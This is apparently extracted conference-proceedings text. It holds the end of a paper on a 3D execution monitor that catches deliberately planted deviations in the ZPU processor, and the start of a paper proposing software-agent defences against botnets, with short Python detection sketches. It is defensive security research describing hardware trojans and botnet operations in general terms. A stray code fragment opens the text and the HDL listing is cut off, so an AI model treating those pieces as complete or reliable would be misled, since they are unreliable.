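def run(program):
    stack = []
    for op, *args in program:
        if op == 'IM':          # push an immediate operand
            stack.append(args[0])
        elif op == 'ADD':       # pop two operands, push their sum
            b, a = stack.pop(), stack.pop()
            stack.append(a + b)
        elif op == 'POP':       # pop and return the result (simplified)
            return stack.pop()
    return None

print(run([('IM', 2), ('IM', 40), ('ADD',), ('POP',)]))  # → 42
```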

The top level design of the ZPU (Figure 4) contains a processor core, a timer, a CPU-to-memory I/O<br />

unit, and a DRAM (memory) unit:<br />

We created and added a monitor entity for the processor core. The units communicate as shown in<br />

Figure 5:<br />

From the VHDL design of the ZPU core, we manually identified the control-type signals, i.e., the<br />

signals directly carrying out the instruction-set execution. Some examples of these include<br />

memory_read_enable and memory_write_enable, an interrupt signal, an operand_immediate signal,<br />

etc. The ZPU VHDL design explicitly characterizes the internal state of the processor with named<br />

293



states, from which we constructed a full finite state machine (of control signal states) and identified all<br />

the legal state-to-state transitions. Some of the ZPU's internal states are shown in Figure 6.<br />

Figure 4: Processor and system configuration without execution monitor<br />

Figure 5: Processor and system configuration with execution monitor added<br />

Figure 6: Some of the ZPU processor internal control states<br />

The ZPU monitor accesses the identified control signals through VHDL "ports". In a physical 3D<br />

design, these signals would transit from the target layer to the monitor layer by through-silicon vias<br />

(TSVs) or some other 3D joining method. This mapping might occur at the 3D floorplanning stage,<br />

before the netlist files have been synthesized into mask database files for each layer. Since this ZPU<br />


design was run in simulation but not physically synthesized, the physical 3D translation is notional.<br />

However, the circuit delay (one full clock cycle) for interlayer signal transmission and the number of<br />

3D posts - approximately 50, in this case - are reasonable, given the current state of 3D interconnect<br />

design (Mysore 2006).<br />

The monitoring logic actually makes two checks. The first check consults a lookup table that contains<br />

the state transition logic. For example, if the monitor detects that the ZPU went from state A to state<br />

B, and that the signal set was S at the completion of the clock cycle when it was in state A, the<br />

monitor looks to see if a matching legal transition exists in the table. The construction of the table is<br />

such that each transition must be unique; the processor can't choose nondeterministically among<br />

several available choices. If the monitor detects that no legal transition from state A with signal set S<br />

to state B existed, then it sets the output "predicate" to false to flag a violation.<br />

The second check verifies that the change from the signal set S, in state A, to the new signal set S', in<br />

state B, was legal according to the transition table. Using the transition that was selected in the<br />

previous step, the monitor evaluates each signal in S' to see if it violated any of the post-conditions of<br />

the transition. If any post-condition is violated, the monitor again sets the appropriate predicate to false.<br />
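In outline, the two checks reduce to a deterministic table lookup followed by a post-condition evaluation. The sketch below models this in Python rather than VHDL, purely for illustration; the state names, signal names and post-condition are invented examples and are not taken from the ZPU design:<br />

```python
# Illustrative model of the monitor's two checks, not the VHDL implementation.
# "Fetch"/"Decode" and the signal names are hypothetical examples.
# Each key (state, signal set) maps to exactly one record, so the processor
# cannot choose nondeterministically among several available transitions.
TRANSITIONS = {
    ("Fetch", frozenset({"memory_read_enable"})): (
        "Decode",                                  # legal next state
        lambda s: "memory_write_enable" not in s,  # post-condition on S'
    ),
}

def predicate(state, signals, next_state, next_signals):
    """True iff the observed transition and signal change are both legal."""
    # Check 1: a matching legal transition must exist in the table.
    record = TRANSITIONS.get((state, frozenset(signals)))
    if record is None or record[0] != next_state:
        return False  # violation: the output predicate goes false
    # Check 2: the new signal set S' must satisfy the transition's post-conditions.
    return record[1](frozenset(next_signals))
```

A legal Fetch-to-Decode step yields true, while an unlisted transition, or one whose new signal set asserts memory_write_enable, drives the predicate false.<br />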

The monitor was evaluated using Mentor Graphics' ModelSim tool. In the first test, the unmodified<br />

ZPU processor executes code with the monitor observing. The ZPU software program used for these<br />

particular tests included a broad mix of all of the ZPU instruction set opcodes. In this test, the<br />

execution of the unmodified ZPU did not cause the monitor to flag any transitions or signal<br />

modifications as illegal. Next, we made small modifications to the ZPU core, then recompiled the<br />

design and ran the simulation again.<br />

Some of the small deviations we introduced in the ZPU processor design included:<br />

When visiting the internal "No-op" state, the ZPU increments a counter which ticks up to 5 "No-op"<br />

instructions, then on the next one sets the "inInterrupt" signal to 1, causing a violation to be<br />

observed by the monitor.<br />

In another modification, the ZPU tries to go straight from the internal "No-op" state to the "Resync"<br />

state (which is not allowed by the design specification), and again a violation is observed by the<br />

monitor.<br />

The HDL code for these example deviations is below:<br />

when State_Nop =><br />

begin_inst



Figure 7: The processor executed normally, and no anomalies were detected<br />

Figure 8: The first processor anomaly was active, and was detected by the monitor<br />

Figure 9: The second processor anomaly was active, and was detected by the monitor<br />

The monitor's transition table had 112 records in it, to cover the 112 allowable transitions among the<br />

23 unique internal processor states. These are reasonably small numbers to implement in a monitor,<br />

but we are also interested in the growth of the size of the monitor, as the target processor becomes<br />

more complex.<br />

Recall from Section 5 that a standard circuit's voltage, as described in VHDL, can represent one of 9<br />

discrete values. For n circuits, then, we would expect 9<sup>n</sup> possible signal permutations - an<br />

impractically large number, if the state machine must have 9<sup>n</sup> states, one for each permutation. We<br />

will explore in future research whether the actual number of required signal permutations, and hence<br />

monitor states, is typically much smaller, as was the case in this example.<br />
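The contrast between the worst case and the observed case can be made concrete; the arithmetic below uses the figures from this section (roughly 50 monitored signals from the 3D-post estimate, 23 states, 112 transitions):<br />

```python
# Worst case: one monitor state per 9-valued permutation of n monitored signals.
n_signals = 50                       # approximate number of monitored signals
worst_case_states = 9 ** n_signals   # about 5 x 10^47 - clearly impractical

# Observed for the ZPU monitor: dramatically smaller.
observed_states = 23
observed_transitions = 112
```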

We synthesized the design, using a Virtex-5 FPGA target, in two different configurations - the<br />

processor architecture alone, and the processor architecture with the monitor. In both cases, the<br />

maximum design speed was 228 MHz, indicating that adding the monitor did not impose a speed<br />

performance limit on the processor.<br />

8. Conclusions<br />

The following are some of the limitations of this research:<br />

The techniques illustrated are focused on only one of the categories of malicious inclusion from<br />

the taxonomy described earlier; detection and mitigation techniques should be developed for the<br />

other types as well, and this is an open research area.<br />

The Execution monitor's performance must not limit the performance of the target processor<br />

which it monitors. For example, the maximum clock speed of the EM should be at least as fast as<br />

the maximum intended clock speed of the target processor. The power, area, and heat<br />

requirements of the monitor should not exceed the practical limits of the overall 3D design. Also,<br />

the clock-cycle latency between MI activation and detection should be small enough to permit<br />

effective correction. We plan to evaluate 3D-EM designs further, using these performance<br />

measures, in the future.<br />

From our preliminary work on the ZPU 3D-EM design, we reached the following conclusions:<br />

Designing and simulating the operation of a basic 3D monitor for a simple processor design is<br />

feasible. However, the physical design space for 3D monitors needs further exploration, and<br />

monitors for more complex processors should be developed.<br />

As expected, simple deviations from the processor's specified instruction-control behavior can be<br />

detected at runtime.<br />

The 3D Execution monitor is the first hardware-based approach with the potential for identifying<br />

processor MIs both during testing and during real-time, fielded operation - an important advantage<br />


over testbench methods, since delayed triggers may cause an MI to be inactive during<br />

predeployment testing.<br />

9. Future work<br />

For this demonstration, we selected the control signals and developed the stateful representation<br />

manually. In future experiments, we hope to work on methods whereby the microarchitectural control<br />

signals can be automatically identified, and the monitor constructed automatically or semiautomatically<br />

(or identify any reasons why the process cannot be automated). We would like to design<br />

a monitor for a register-based processor with one or more data buses, in order to compare it with<br />

monitoring a stack-based processor like the ZPU. We would also like to design processor anomalies<br />

which accomplish some more meaningful subversions. Finally, we wish to test whether the monitor<br />

can detect unknown MIs, designed by third parties unfamiliar with the monitor construction.<br />

It would be useful to scale up the 3D Execution monitor experiments to more complex processor<br />

designs, with modern features like pipelined and speculative execution, multithreading, vector<br />

operations, virtualization support, and multi-core.<br />

Acknowledgements<br />

This research was funded in part by National Science Foundation Grant CNS-0910734.<br />

References<br />

Adee, S., (2008) "The Hunt for the Kill Switch", [online] IEEE Spectrum, May 2008,<br />

http://spectrum.ieee.org/semiconductors/design/the-hunt-for-the-kill-switch<br />

Agrawal, D., Baktir, S., Karakoyunlu, D., Rohatgi, P., and Sunar, B. (2007) "Trojan Detection Using IC<br />

Fingerprinting", 2007 IEEE Symposium on Security and Privacy.<br />

Defense Science Board (2005). Report of the 2005 Defense Science Board Task Force on High Performance<br />

Microchip Supply, Office of the Undersecretary of Defense for Acquisition, Technology, and Logistics.<br />

Iman, S. (2008) Step-by-Step Functional Verification with SystemVerilog and OVM, Hansen Brown Publishing,<br />

San Francisco.<br />

Jin, Y. and Makris, Y. (2008) "Hardware Trojan Detection Using Path Delay Fingerprint", Proceedings of the 2008<br />

IEEE International Workshop on Hardware-Oriented Security and Trust.<br />

Jin, Y., Kupp, N., and Makris, Y. (2009) "Experiences in Hardware Trojan Design and Implementation",<br />

Proceedings of the IEEE International Workshop on Hardware-Oriented Security and Trust.<br />

King, S., Tucek, J., Cozzie, A., Grier, C. Jiang, W., and Zhou, Y. (2009) "Designing and Implementing Malicious<br />

Hardware", Proceedings of the IEEE International Workshop on Hardware Oriented Security and Trust.<br />

Markoff, J. (2009) "Old Trick Threatens Newest Weapons", [online], New York Times, 27 October.<br />

http://www.nytimes.com/2009/10/27/science/27trojan.html?_r=2.<br />

McCormack, Richard (2008) "DoD Broadens 'Trusted' Foundry Program to Include Microelectronics Supply<br />

Chain", Manufacturing & Technology News, Thursday, 28 February.<br />

Mysore, S., Agrawal, B., Srivastava, N., Lin, S., Banerjee, K., and Sherwood, T. (2006) "Introspective 3D Chips",<br />

2006 International <strong>Conference</strong> on Architectural Support for Programming Languages and Operating<br />

Systems.<br />

Nystedt, D. (2007) "Intel Got its New China Fab for a Bargain, Analyst Says", [online] CIO.com,<br />

http://www.cio.com/article/101450/Intel_Got_Its_New_China_Fab_for_a_Bargain_Analyst_Says<br />

OpenCores.org (2010), [online] http://opencores.org.<br />

Pellerin, D., and Taylor, D. (1997) VHDL Made Easy, Prentice Hall, Upper Saddle River, NJ.<br />

Puttaswamy, K., and Loh, G., (2006) "Implementing Register Files for High-Performance Microprocessors in a<br />

Die-Stacked (3D) Technology", Proceedings of the 2006 Emerging VLSI Technologies and Architectures,<br />

Vol. 00, March.<br />

Rad, R., Plusquellic, J., and Tehranipoor, M. (2008) "Sensitivity Analysis to Hardware Trojans Using Power<br />

Supply Transient Signals", 2008 IEEE International Workshop on Hardware Oriented Security and Trust.<br />

Schneider, F. (2000) "Enforceable Security Policies", ACM Transactions on Information and System Security,<br />

Vol. 3, No. 1, February, pp 30-50.<br />

Tehranipoor, M. and Koushanfar, F. (2010) "A Survey of Hardware Trojan Taxonomy and Detection", IEEE<br />

Design and Test of Computers, vol. 27, issue 1, January/February, pp10-24.<br />

Valamehr, J., Tiwari, M., Sherwood, T., Kastner, R., Huffmire, T., Irvine, C., and Levin, T., (2010) Hardware<br />

Assistance for Trustworthy Systems through 3-D Integration, Proceedings of the 2010 Annual Computer<br />

Security Applications <strong>Conference</strong> (ACSAC), Austin, TX, December.<br />

Yinung, F. (2009) "Challenges to Foreign Investment in High-Tech Semiconductor Production in China", United<br />

States International Trade Commission, Journal of International Commerce and Economics, May.<br />



Towards an Intelligent Software Agent System as Defense<br />

Against Botnets<br />

Evan Dembskey and Elmarie Biermann<br />

UNISA, Pretoria, South Africa<br />

French South African Institute of Technology CPUT, Cape Town, South Africa<br />

Dembsej@unisa.ac.za<br />

bierman@xsinet.co.za<br />

Abstract: Computer networks are targeted by state and non-state actors and criminals. With the<br />

professionalization and commoditization of malware we are moving into a new realm where off-the-shelf and<br />

time-sharing malware can be bought or rented by the technically unsophisticated. The commoditization of<br />

malware comes with all the benefits of mass produced software, including regular software updates, access to<br />

fresh exploits and the use of hack farms. To an extent, defense is out of the hands of government and in<br />

commercial and private hands. However, the cumulative effect of Information Warfare attacks goes<br />

beyond the commercial and private spheres and affects the entire state. Thus the responsibility for defense<br />

should be distributed amongst all actors within a state. As malware increases and becomes more sophisticated<br />

and innovative in its attack vectors, command & control structures and operation, more sophisticated,<br />

innovative and collaborative methods are required to combat them. The current scenario of partial protection due<br />

to resource constraints is inadequate. It is thus necessary to create defence systems that are robust and resilient<br />

against known vectors and vectors that have not previously been used in a manner that is easy and cheap to<br />

implement across government, commercial and private networks without compromising security. We argue that a<br />

significant portion of daily network defence must be allocated to software agents acting in a beneficent botnet<br />

with distributed input from human actors, and propose a framework for this purpose. This paper is based on the<br />

preliminary work of a PhD thesis on the topic of using software agents to combat botnets, and covers the<br />

preliminary literature survey and design of the solution. This includes a crowd sourcing component that uses<br />

information about malware gained from software agents and from human users. Part of this work is based on<br />

previous research by the authors. It is anticipated that the research will result in a clearer understanding of the<br />

role of software agents in defence against computer network operations, and a proof-of-concept<br />

implementation.<br />

Keywords: information warfare, Botnet, software agent<br />

1. Introduction<br />

We propose to use distributed software agents (SA) as a method for overcoming botnets and other<br />

malware in the area of Information Warfare (IW). This area of research is important due to the growing<br />

threat posed by malware. This research addresses some of the long term research goals identified by<br />

the US National Research Council (National Research Council (U.S.). Committee on the Role of<br />

Information Technology in Responding to Terrorism et al. 2003) and four of the ten suggested<br />

research areas in (Denning, Denning 2010). It is an extension and refinement of research undertaken<br />

to determine if an IW SA framework is viable (Dembskey, Biermann 2008).<br />

Malware is a reality of networked computers and is being increasingly used by state, criminal and<br />

terrorist actors as weapons, vectors for crime and tools of coercion. While it is debatable whether a<br />

digital Pearl Harbour is a genuine possibility (Smith 1998), it is generally agreed that malware is on the increase<br />

and is being commoditized (Knapp, Boulton 2008, Microsoft 2010, Dunham, Melnick 2009), though<br />

there is some dissent on this point (Prince 2010). Technically unsophisticated users can purchase<br />

time on existing botnets to accomplish some goal, e.g. phishing attacks, spamming, or the denial,<br />

destruction or modification of data.<br />

A botnet is a distributed group of software agent-like bots that run autonomously and automatically,<br />

usually without the knowledge of the computer's owner. Botnets are usually, but not necessarily,<br />

malicious. The purpose of botnets is not necessarily destructive; it is often financial gain, which results<br />

in a very different approach to development and Command & Control. An effective process of<br />

prevention, detection and removal will mitigate botnets regardless of their purpose.<br />

IW is warfare that explicitly recognises information as an asset. Computer Network Operations (CNO)<br />

is a form of IW that uses global computer networks to further the aims of warfare. CNO is divided into<br />

Computer Network Attack (CNA) and Computer Network Defence (CND). Increasingly, politically<br />

motivated cyber attacks are focusing on commercial and not government infrastructure (Knapp,<br />


Boulton 2008). Also, money from online scams may be used to fund terrorist and further criminal<br />

activity. SA are a form of software that have the properties of intelligence, autonomy and mobility. We<br />

define SA as programs that autonomously and intelligently acquire, manipulate, distribute and<br />

maintain information on behalf of a user or another software agent.<br />

Intrusion prevention is the Holy Grail of security. This goal is currently unobtainable; there will be<br />

intrusions. The literature shows that traditional defences such as firewalls, antivirus and intrusion<br />

prevention are not effective against botnets (Ollmann 2010). Some researchers believe that anti-malware<br />

software is less effective than in the past (Oram, Viega 2009). Researchers at Microsoft<br />

(Microsoft 2010) assert that malware activity increased 8.9% from the first to the second half of 2009. This is<br />

probably an overly conservative figure. Some researchers estimate that botnet infections are up to<br />

4000% higher than reported (Dunham, Melnick 2009). One notable problem in prevention is that social<br />

engineering (Bailey et al. 2009) is a major cause of infection, which defeats many prevention systems<br />

and undermines detection.<br />

One development that will likely impact the malware threatscape is the arrival of broadband access to<br />

Africa. For an analysis of the impact see (Jansen van Vuuren, Phahlamohlaka & Brazzoli 2010). It is<br />

estimated that there are 100 million computers available for botnet herders to use (Carr, Shepherd<br />

2010). However, we are of the opinion that, due to a range of socio-economic factors, Africa may be a<br />

source of volunteers for botnets similar to Israel’s Defenderhosting.<br />

2. Malware<br />

Malware is a term encompassing all the different categories of malicious software, which include<br />

amongst others Trojans, viruses, worms and spyware. The advancements in technology and<br />

especially the ability to be connected 24/7 to people and resources across the globe, have hugely<br />

increased the volumes of malware circulating global networks. This is evident from the large amount<br />

of spam constantly and increasingly being delivered to mailboxes. According to Damballa (2009) the<br />

success of spamming botnets has led to the commoditization of spam in which volume has become<br />

the primary means to generate cash.<br />

Malware is created and initiated in countries across the globe, with different websites listing different<br />

statistics regarding the country of origin on a weekly basis. For example, the USA, China and Russia<br />

are listed by The Spamhaus Project (http://www.spamhaus.org/statistics/countries.lasso) as the<br />

countries where the largest percentage of spam is created and exported, while M86 Security Labs<br />

(http://www.m86security.com/labs/spam_statistics.asp) lists the US, India and Brazil as the recent<br />

largest contributors.<br />

Creating or obtaining malware has become relatively easy with the evolution of technology and<br />

especially the commoditization of malicious code. Different types of malware can be obtained via<br />

malware kits or through specialists offering their services to design and develop unique pieces of<br />

malicious code for different platforms or forums. Some of the more famous examples include<br />

Webattacker, Smeg, Fragus, Zeus and Adpack.<br />

The evolution and spread of malware is directly related to the number of entities being connected,<br />

with an increase in not only the amount but also the variety of malware evident today.<br />

With the increase in malware also came constant research and development to combat this<br />

unwanted software, which in turn drives the creators of malware to be more innovative. According to<br />

Chiang & Lloyd (2007), the traditional method of using the Internet Relay Chat (IRC) protocol for<br />

command and control made way for new methods of hiding the command and control communication<br />

such as HTTP based communications, encryption and peer-to-peer networks as it became easier to<br />

detect and block IRC traffic. This became evident in the creation and re-invention of botnets such as<br />

Agobot (Wang, 2009), Rustock (Chiang & Lloyd, 2007) and Conficker (Porras, 2009).<br />

The impact of the advances, commoditization and the DIY culture for the creation of malware on<br />

global networks, and especially on global security, is huge. Malware is used to, amongst other things, steal<br />

personal data, conduct espionage, harm government and business operations, deny user access to<br />

information and services, and, according to a report by the Organisation for<br />

Economic Co-operation and Development (OECD, 2007), poses a serious threat to the Internet<br />

economy. Securing networks is not only dependent on security vendors and security specialists but<br />

also relies on ordinary users of the networks to protect their workstations. The increasing use of social<br />


networks such as Facebook, Twitter and MySpace, as well as the mobile generation, provides increasing<br />

opportunities for malware to access contact details and personal information.<br />

It is vital for the Internet economy that robust and resilient counter-systems be constantly in<br />

operation, while adapting to changing conditions.<br />

3. Current malware detection techniques<br />

The first hint of a malware infection may be the receipt of an email stating that a system appears to be<br />

infected and has abused a different system; the convention is that administrative contacts of some<br />

form are listed at global regional information registry sites such as AfriNIC, ARIN, APNIC, LACNIC<br />

and RIPE to assist in communication. The abuse may take the form of spam, scanning activity, DDoS<br />

attacks, phishing or harassment (Schiller, Binkley & Harley 2007).<br />

It is a poor security method indeed that relies on informants only. A better approach is the use of<br />

network-monitoring tools such as Wireshark or tcpdump, as malware activity results in data that can be<br />

analysed. Examples of prevalent data types are (Bailey et al. 2009):<br />

DNS Data: Data regarding name resolution can be obtained by mirroring data to and from DNS<br />

servers and can be used to detect botnet attack behaviour.<br />

Netflow Data: Netflow data represents information gathered from the network by sampling traffic<br />

flows and obtaining information regarding source and destination IP addresses and port numbers.<br />

This is not available on all networks.<br />

Packet Tap Data: Packet tap data provides a more fine-grained view than netflow, but is<br />

generally more costly in terms of hardware and computation. Simple encryption reduces this<br />

visibility back to the same order as netflow.<br />

Address Allocation Data: Knowing where hosts and users are in the network can be a powerful<br />

tool for identifying malware reconnaissance behaviour and rapid attribution.<br />

Honeypot Data: Placed on a network with the express intention of them being turned into botnet<br />

members, honeypots can be a powerful tool for gaining insight into botnet means and motives.<br />

Host Data: Host level data, from OS and application configurations, logs and user activity<br />

provides a wealth of security information and can avoid the visibility issues with encrypted data.<br />

An even better method is an Intrusion Detection System (IDS). An IDS can either be host-based<br />

(HIDS) or network-based (NIDS). Both of these are further categorised by the type of algorithm used,<br />

namely anomaly- and signature-based detection. Anomaly-based techniques develop an<br />

understanding of what normal behaviour is on a system, and reports any deviation. Signature-based<br />

techniques use representations of known malware to decide if software is indeed malicious. A<br />

specialised form of anomaly-based detection, called specification-based detection makes use of a<br />

rule set to decide if software is malicious. Violation of these rules indicates possible malicious<br />

software.<br />
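The two algorithm families can be contrasted in a toy sketch; the signature set, baseline statistics and threshold below are invented for illustration only:<br />

```python
# Toy contrast of signature- vs anomaly-based detection (invented data).
KNOWN_SIGNATURES = {"deadbeef", "c0ffee"}  # representations of known malware

def signature_detect(payload_hash):
    """Signature-based: match against representations of known malware."""
    return payload_hash in KNOWN_SIGNATURES

def anomaly_detect(observed, baseline_mean, baseline_std, k=3.0):
    """Anomaly-based: report deviation from an understanding of normal behaviour."""
    return abs(observed - baseline_mean) > k * baseline_std
```

Signature detection misses novel malware absent from the set, while anomaly detection can flag it at the cost of false positives, illustrating the trade-offs each technique carries.<br />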

A NIDS sees protected hosts in terms of the external interfaces to the rest of the network, rather than<br />

as a single system, and gets most of its results by network packet analysis. Much of the data used is<br />

the same as discussed using the manual methods above. A HIDS focuses on individual systems.<br />

That doesn’t mean each host runs its own HIDS application (they are generally administered centrally);<br />

rather, it means that the HIDS monitors activity on a protected host. It can pick up evidence of<br />

breaches that have evaded outward-facing NIDS and firewall systems or have been introduced by<br />

other means, such as internal attacks, direct tampering by internal users and the introduction of<br />

malicious code from removable media (Schiller, Binkley & Harley 2007).<br />

Malware can also be detected forensically. Though this occurs after damage has been incurred, it is<br />

important for a number of reasons including legal purposes. Forensic aims can include identification,<br />

preservation, analysis, and presentation of evidence. Digital investigations that are or might be<br />

presented in a court of law must meet the applicable standards of admissible evidence. Admissibility<br />

is a concept that varies according to jurisdiction (Schiller, Binkley & Harley 2007).<br />

Two techniques that are essentially forensic in nature are darknets and honeynets, though the<br />

knowledge gained from their use helps to prevent, detect and remove botnets. A darknet is a closed<br />

private network used for file sharing. However, the term has been extended in the security sphere to<br />

apply to IP address space that is routed but which contains no active hosts and therefore carries no legitimate traffic.<br />


Darknets are most useful as a global resource for sites and groups working against botnets on an<br />

Internet-wide basis (Schiller, Binkley & Harley 2007). A honeypot is a decoy system set up to attract<br />

attackers and study their methods and capabilities. A honeynet is usually defined as consisting of a<br />

number of honeypots in a network, offering the attacker real systems, applications, and services to<br />

work on and monitored transparently by a Layer 2 bridging device (honeywall). A static honeynet can<br />

quickly be spotted and blacklisted by attackers, but distributed honeynets attempt to address that<br />

issue and are likely to capture richer, more varied data (Schiller, Binkley & Harley 2007). In contrast to<br />

honeynets, darknets do not advertise themselves.<br />

Botnets, the malware we are interested in, are difficult to combat for the following reasons (Bailey et<br />

al. 2009):<br />

All aspects of the botnet’s life-cycle are evolving constantly.<br />

Each detection technique comes with its own set of tradeoffs with respect to false positives and<br />

false negatives.<br />

Different types of networks approach the botnet problem with differing goals, with different<br />

visibility into the botnet behaviours, and different sources of data with which to uncover those<br />

behaviours.<br />

A successful solution for combating botnets will need to cope with each of these realities and their<br />

complex interactions with each other.<br />

4. Software agents<br />

A software agent is a program that autonomously acquires, manipulates, distributes and maintains<br />

information on behalf of some entity. We reject the trend of labeling software utilities such as<br />

aggregators and download managers as SA; we base our definition on the properties of the software.<br />

The literature defines a large number of agent properties. Not all properties are found in all agents,<br />

but in order to be termed an agent, software must satisfy some minimum set of these properties. Bigus<br />

and Bigus (Bigus, Bigus 2001) suggest that these are autonomy, intelligence and mobility. These<br />

properties are defined as follows:<br />

Autonomy - The autonomous agent exercises control over its own actions and has some degree<br />

of control over its internal state. It displays judgment when faced with a situation requiring a<br />

decision, and makes a decision without direct external intervention.<br />

Intelligence - This does not imply self-awareness, but the ability to behave rationally and pursue a<br />

goal in a logical and rational manner. Intelligence varies between simple coded logic and complex<br />

AI-based methods such as inferencing and learning.<br />

Mobility- Mobility is the degree to which agents move through the network. Some may be static<br />

while others may migrate as the need arises. The decision to move should be made by the agent<br />

(Murch, Johnson 1999), thus ensuring the agent has the property of autonomy.<br />
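A minimal skeleton of how these three properties might surface in code is given below; the class and method names are ours, not drawn from any agent framework:<br />

```python
# Minimal software-agent skeleton illustrating autonomy, intelligence, mobility.
class Agent:
    def __init__(self, goal, host):
        self.goal = goal      # the goal pursued rationally (intelligence)
        self.host = host      # current location in the network

    def decide(self, situation):
        # Autonomy: judgment exercised without direct external intervention.
        # Intelligence here is simple coded logic; it could be replaced by
        # inferencing or learning.
        return "act" if situation == self.goal else "wait"

    def migrate(self, new_host):
        # Mobility: the decision to move is made by the agent itself.
        self.host = new_host
        return self.host
```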

From these properties we can judge that SA have potential applications in dealing with tasks that are<br />

ill-defined or less structured. It is also apparent that SA interact with their task environments locally;<br />

the implication of this is that the same agent can exhibit different behaviour in different environments<br />

(Liu 2001). Padgham & Winikoff (2004) provide a list of reasons why agents are<br />

useful, including loose coupling, decentralisation, persistence, better functioning in open and complex<br />

systems and reactiveness as well as proactiveness. The use of SA to combat botnets is not<br />

unprecedented. It had already been suggested that AF.MIL should be purposely made part of a<br />

botnet (Williams 2008). Some researchers see botnets as types of SA (Bigus, Bigus 2001). Other<br />

researchers (Stytz, Banks 2008) have begun to work on the problem of implementing such an<br />

approach.<br />

5. Proposed system<br />

Vulnerabilities are introduced in software deliberately or accidentally during development, or via<br />

software or configuration changes during operation. Botnets are not typically introduced during<br />

software development and thus require later, usually unintentional, introduction. Possible vectors<br />

of infection are viruses, worms and Trojans. These may be introduced via email, download, drive-by<br />

download, network worm or some external storage device. According to (Cruz 2008) the majority of<br />

infections occur due to downloads (53%) and infection via other malware (43%). Email and<br />

removable drives account for 22% of infections. Instant Messaging, vulnerabilities, P2P, iFrame<br />


compromises, other infected files and other vectors account for 27% (the total is higher than 100%<br />

because some malware uses multiple vectors). The majority of infections are the result of<br />

downloads, suggesting this should be the primary threat to mitigate. This is the approach adopted in this<br />

research, with the recognition that this could change at any time, temporarily or permanently, thus<br />

necessitating a system that is flexible enough to cope with this change.<br />
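The quoted percentages deliberately sum to more than 100%; a quick tally of the figures from Cruz (2008), as cited above, makes the overlap explicit:<br />

```python
# Infection-vector shares from Cruz (2008); the total beyond 100% reflects
# malware that uses multiple infection vectors.
vectors = {
    "downloads": 53,
    "infection via other malware": 43,
    "email and removable drives": 22,
    "IM, vulnerabilities, P2P, iFrame, other": 27,
}
total = sum(vectors.values())  # 145: 45 percentage points of multi-vector overlap
```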

Several methods to detect and deter botnets have been proposed such as incorporating data mining<br />

techniques as well as methods to detect communication between the bot and the<br />

master (Massud et al., 2008).<br />

Massively multiplayer online role-playing games (MMORPGs) battle to differentiate between human and<br />

bot players. Yampolskiy & Govindaraju (2008) studied running processes and network traffic as a<br />

method to distinguish between humans and bots. Chen et al (2009) identified bots in MMORPG<br />

through traffic analysis. They showed amongst others that traffic is distinguishable by (1) the regularity<br />

in the release time of the client command; (2) the trend and magnitude of traffic burstiness in multiple<br />

time scales; and (3) the sensitivity to different network connections. Thawonmas et al (2008) conduct<br />

behaviour analysis within this gaming environment and implement methods focusing on resource<br />

gathering and trading behavior. Traffic classification is also performed by Li et al (2009), with<br />

Lu et al (2009) proposing a hierarchical framework to automatically discover botnets. They first<br />

classify network traffic into different application communities by using payload signatures.<br />
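Feature (1) above, the regularity of client command release times, can be illustrated with a short sketch. The 0.1 cut-off and the sample traces below are purely illustrative assumptions, not values from Chen et al:<br />

```python
import statistics

def interarrival_cv(timestamps):
    """Coefficient of variation of inter-arrival times: timer-driven bot
    traffic clusters tightly (low CV), human activity is burstier (high CV)."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return statistics.pstdev(gaps) / statistics.mean(gaps)

def looks_like_bot(timestamps, threshold=0.1):
    # Hypothetical cut-off; a real detector would calibrate it on labelled traces.
    return interarrival_cv(timestamps) < threshold

bot = [0.5 * i for i in range(20)]                     # a command every 0.5 s
human = [0, 0.4, 1.9, 2.1, 5.0, 5.2, 9.8, 10.1, 14.0]  # irregular gaps

print(looks_like_bot(bot))    # True
print(looks_like_bot(human))  # False
```

In practice such a statistic would be one feature among several, combined with burstiness and connection-sensitivity measures as in the cited work.<br />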

Li et al (2008) took a different perspective by looking at botnet-disabling mechanisms from an economic<br />

angle, introducing virtual bots as a method to create uncertainty in the botnet market.<br />

This links to methods that study the collective behavior of bots and derive solutions from that<br />

focus (Pathak et al., 2009; Stone-Gross et al., 2009). Xie et al (2008)<br />

characterize botnets by leveraging spam payload and spam server traffic properties. They identify<br />

botnet hosts by generating botnet spam signatures from emails. Ramachandran & Feamster (2006)<br />

studied the network-level behavior of spammers. They identified specific characteristics, such as<br />

spam being sent from a few regions of IP address space. They also propose that<br />

algorithms for identifying botnet membership should be based on network-level properties. Staying on<br />

the network level, Villamarín-Salomón & Brustoloni (2009) propose a Bayesian approach for detecting<br />

bots based on the similarity of their DNS traffic to that of known bots.<br />
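The Bayesian idea can be sketched as follows; the domain names, likelihoods and prior below are made-up illustrative numbers, not values taken from Villamarín-Salomón & Brustoloni:<br />

```python
import math

# Hypothetical likelihoods: probability that a host queries each domain,
# given that it is a bot versus benign (illustrative numbers only).
P_GIVEN_BOT = {"cc.example.net": 0.9, "update.example.org": 0.6}
P_GIVEN_BENIGN = {"cc.example.net": 0.01, "update.example.org": 0.3}

def bot_posterior(queried_domains, prior_bot=0.05):
    """Naive-Bayes posterior probability that a host is a bot, scored
    from the similarity of its DNS queries to known-bot traffic."""
    log_odds = math.log(prior_bot / (1.0 - prior_bot))
    for domain in queried_domains:
        p_bot = P_GIVEN_BOT.get(domain, 0.5)       # unseen domains are uninformative
        p_benign = P_GIVEN_BENIGN.get(domain, 0.5)
        log_odds += math.log(p_bot / p_benign)
    return 1.0 / (1.0 + math.exp(-log_odds))

print(bot_posterior(["cc.example.net"]))      # well above 0.5
print(bot_posterior(["update.example.org"]))  # stays below 0.5
```

A deployed detector would learn the per-domain likelihoods from observed traffic of known bots rather than fix them by hand.<br />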

A detailed look into the solutions summarized above led us to propose a design incorporating the use<br />

of intelligent SA as a counter to botnets. Our design incorporates the different aspects and required<br />

characteristics detailed in the literature. It is also a next step in detailing our proposed<br />

framework (Dembskey, Biermann 2008). As stated in (Dembskey, Biermann 2008), we propose three<br />

layers, namely IDS, Observer and Communication.<br />

Figure 1: Three layers (IDS; Observer; Communication Layer)<br />
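A minimal sketch of how the three layers might interact, assuming an in-memory message queue as the Communication layer; all class and method names here are hypothetical, not part of the proposed framework:<br />

```python
class CommunicationLayer:
    """Carries messages between distributed agents (toy in-memory stand-in)."""
    def __init__(self):
        self._queue = []

    def publish(self, message):
        self._queue.append(message)

    def drain(self):
        messages, self._queue = self._queue, []
        return messages


class ObserverAgent:
    """Gathers observations (traffic features, DNS data, behaviour)
    and forwards them over the communication layer."""
    def __init__(self, comms):
        self.comms = comms

    def report(self, observation):
        self.comms.publish(observation)


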